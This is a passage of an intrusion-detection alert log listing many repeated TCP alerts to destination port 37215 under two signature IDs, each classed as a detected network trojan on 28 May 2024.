            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879085
            SID:2829579
            Source Port:56596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.078746
            SID:2835222
            Source Port:33284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569014
            SID:2829579
            Source Port:38554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.667137
            SID:2829579
            Source Port:42114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757879
            SID:2835222
            Source Port:40274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944044
            SID:2835222
            Source Port:35442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601920
            SID:2829579
            Source Port:54874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482803
            SID:2835222
            Source Port:53908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290830
            SID:2835222
            Source Port:38792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383953
            SID:2835222
            Source Port:42644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523631
            SID:2835222
            Source Port:44174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706599
            SID:2829579
            Source Port:36752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922239
            SID:2835222
            Source Port:40184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055112
            SID:2829579
            Source Port:41568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026984
            SID:2829579
            Source Port:49202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280213
            SID:2829579
            Source Port:37096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.915927
            SID:2835222
            Source Port:46094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.608128
            SID:2835222
            Source Port:53892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330953
            SID:2835222
            Source Port:42314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745014
            SID:2835222
            Source Port:45510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988694
            SID:2829579
            Source Port:40200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001014
            SID:2829579
            Source Port:36426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000542
            SID:2829579
            Source Port:34112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568195
            SID:2835222
            Source Port:38690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929146
            SID:2835222
            Source Port:49168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738671
            SID:2835222
            Source Port:40664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968397
            SID:2829579
            Source Port:35210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777505
            SID:2835222
            Source Port:36166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.063480
            SID:2829579
            Source Port:54542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851027
            SID:2829579
            Source Port:47902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762500
            SID:2829579
            Source Port:57916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840952
            SID:2829579
            Source Port:51476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793390
            SID:2829579
            Source Port:58986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815557
            SID:2829579
            Source Port:59146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738755
            SID:2829579
            Source Port:35196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935268
            SID:2829579
            Source Port:37190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757354
            SID:2829579
            Source Port:52744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.872314
            SID:2829579
            Source Port:52730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296389
            SID:2835222
            Source Port:40790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290946
            SID:2835222
            Source Port:44980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014794
            SID:2829579
            Source Port:53008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852071
            SID:2829579
            Source Port:45068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779479
            SID:2829579
            Source Port:45668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031546
            SID:2835222
            Source Port:39682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918899
            SID:2829579
            Source Port:51422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.691686
            SID:2835222
            Source Port:43990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031520
            SID:2835222
            Source Port:48286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251145
            SID:2829579
            Source Port:48582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532897
            SID:2829579
            Source Port:57462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899654
            SID:2829579
            Source Port:42034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.138307
            SID:2829579
            Source Port:57716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851185
            SID:2835222
            Source Port:43408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510473
            SID:2829579
            Source Port:51902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954230
            SID:2835222
            Source Port:50486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911386
            SID:2835222
            Source Port:55056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996077
            SID:2835222
            Source Port:60572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857452
            SID:2835222
            Source Port:44622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875070
            SID:2835222
            Source Port:37036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058603
            SID:2835222
            Source Port:60712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761067
            SID:2835222
            Source Port:48834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312317
            SID:2829579
            Source Port:48736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.784684
            SID:2835222
            Source Port:47528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052236
            SID:2835222
            Source Port:58358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.299864
            SID:2829579
            Source Port:37460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919049
            SID:2835222
            Source Port:35424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553142
            SID:2835222
            Source Port:53858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.771516
            SID:2829579
            Source Port:56594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809618
            SID:2835222
            Source Port:46654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649784
            SID:2835222
            Source Port:55840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319662
            SID:2835222
            Source Port:48012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.020562
            SID:2835222
            Source Port:56244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326824
            SID:2835222
            Source Port:58148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996260
            SID:2829579
            Source Port:49246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941792
            SID:2829579
            Source Port:35994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721386
            SID:2829579
            Source Port:42568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996716
            SID:2835222
            Source Port:39828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930073
            SID:2829579
            Source Port:58398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984701
            SID:2829579
            Source Port:46174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752185
            SID:2829579
            Source Port:50236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995416
            SID:2835222
            Source Port:35554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810257
            SID:2835222
            Source Port:42222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849718
            SID:2835222
            Source Port:41736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.379921
            SID:2829579
            Source Port:42516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943129
            SID:2829579
            Source Port:48134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771241
            SID:2829579
            Source Port:50800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939077
            SID:2835222
            Source Port:46370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040193
            SID:2835222
            Source Port:51472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067584
            SID:2835222
            Source Port:36540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.656974
            SID:2829579
            Source Port:33146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050751
            SID:2829579
            Source Port:60978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543749
            SID:2829579
            Source Port:36414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.071090
            SID:2829579
            Source Port:52492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051403
            SID:2829579
            Source Port:41660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730030
            SID:2829579
            Source Port:57544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386746
            SID:2829579
            Source Port:49622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.528178
            SID:2829579
            Source Port:41494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715349
            SID:2829579
            Source Port:51214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060231
            SID:2835222
            Source Port:57710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730979
            SID:2835222
            Source Port:45408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.971798
            SID:2829579
            Source Port:42580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.776362
            SID:2835222
            Source Port:33754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.403366
            SID:2835222
            Source Port:58262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861427
            SID:2835222
            Source Port:59616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.447025
            SID:2835222
            Source Port:55958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597634
            SID:2835222
            Source Port:55728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807410
            SID:2829579
            Source Port:54484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853597
            SID:2835222
            Source Port:60818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276352
            SID:2829579
            Source Port:42396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507258
            SID:2829579
            Source Port:54282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000092
            SID:2835222
            Source Port:60770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869159
            SID:2835222
            Source Port:36832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308022
            SID:2829579
            Source Port:43698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.849819
            SID:2835222
            Source Port:52678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.703888
            SID:2829579
            Source Port:33456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.768481
            SID:2829579
            Source Port:33390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880884
            SID:2829579
            Source Port:41228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994837
            SID:2835222
            Source Port:49140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376634
            SID:2835222
            Source Port:46420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.938037
            SID:2829579
            Source Port:55814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.798327
            SID:2829579
            Source Port:42746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865847
            SID:2835222
            Source Port:50452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066714
            SID:2829579
            Source Port:60290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777427
            SID:2829579
            Source Port:58238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996137
            SID:2835222
            Source Port:50484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.060414
            SID:2829579
            Source Port:36524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852881
            SID:2829579
            Source Port:39792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892293
            SID:2835222
            Source Port:53726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516532
            SID:2835222
            Source Port:44190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655666
            SID:2835222
            Source Port:36648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.000898
            SID:2835222
            Source Port:46306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.703754
            SID:2829579
            Source Port:45190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508104
            SID:2829579
            Source Port:46828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891685
            SID:2829579
            Source Port:41892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843599
            SID:2829579
            Source Port:42864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873517
            SID:2829579
            Source Port:60004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470785
            SID:2835222
            Source Port:48510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778468
            SID:2829579
            Source Port:37460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290024
            SID:2829579
            Source Port:60210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581764
            SID:2835222
            Source Port:59958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060331
            SID:2835222
            Source Port:44646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069115
            SID:2835222
            Source Port:37580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905823
            SID:2829579
            Source Port:55552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.438593
            SID:2829579
            Source Port:38696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924878
            SID:2835222
            Source Port:35748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731262
            SID:2829579
            Source Port:41114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052825
            SID:2829579
            Source Port:59190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.305002
            SID:2835222
            Source Port:37972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.741300
            SID:2835222
            Source Port:43866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862054
            SID:2829579
            Source Port:34166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862992
            SID:2835222
            Source Port:38348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762413
            SID:2835222
            Source Port:51188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723897
            SID:2835222
            Source Port:35944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482810
            SID:2835222
            Source Port:58278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.508185
            SID:2829579
            Source Port:46370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926323
            SID:2829579
            Source Port:52262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779459
            SID:2829579
            Source Port:54430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745587
            SID:2835222
            Source Port:45702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185170
            SID:2835222
            Source Port:55126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563462
            SID:2835222
            Source Port:57646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.951566
            SID:2829579
            Source Port:50010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018858
            SID:2829579
            Source Port:51442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743211
            SID:2829579
            Source Port:55236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880502
            SID:2835222
            Source Port:42168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831769
            SID:2829579
            Source Port:33124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811934
            SID:2835222
            Source Port:53266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342251
            SID:2835222
            Source Port:39918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919712
            SID:2835222
            Source Port:58120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026886
            SID:2829579
            Source Port:58464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309528
            SID:2829579
            Source Port:60684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442688
            SID:2835222
            Source Port:56004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065475
            SID:2835222
            Source Port:40968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278164
            SID:2829579
            Source Port:35792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716073
            SID:2835222
            Source Port:37622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740177
            SID:2829579
            Source Port:46742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811505
            SID:2835222
            Source Port:39576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.266223
            SID:2835222
            Source Port:43830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857747
            SID:2835222
            Source Port:56616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878926
            SID:2829579
            Source Port:56830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020537
            SID:2835222
            Source Port:39076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278407
            SID:2829579
            Source Port:36294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756083
            SID:2829579
            Source Port:52070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059794
            SID:2835222
            Source Port:43512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783523
            SID:2829579
            Source Port:50464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.101991
            SID:2835222
            Source Port:52484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.742093
            SID:2829579
            Source Port:55368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336584
            SID:2829579
            Source Port:57790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956050
            SID:2835222
            Source Port:56900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809165
            SID:2829579
            Source Port:46410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.845045
            SID:2835222
            Source Port:43996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808087
            SID:2835222
            Source Port:57834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967408
            SID:2829579
            Source Port:41484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741992
            SID:2835222
            Source Port:38404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.486955
            SID:2835222
            Source Port:51190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107952
            SID:2835222
            Source Port:38230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533766
            SID:2829579
            Source Port:58884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712039
            SID:2829579
            Source Port:53094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811078
            SID:2829579
            Source Port:43732
            Destination Port:37215
            Protocol:TCP
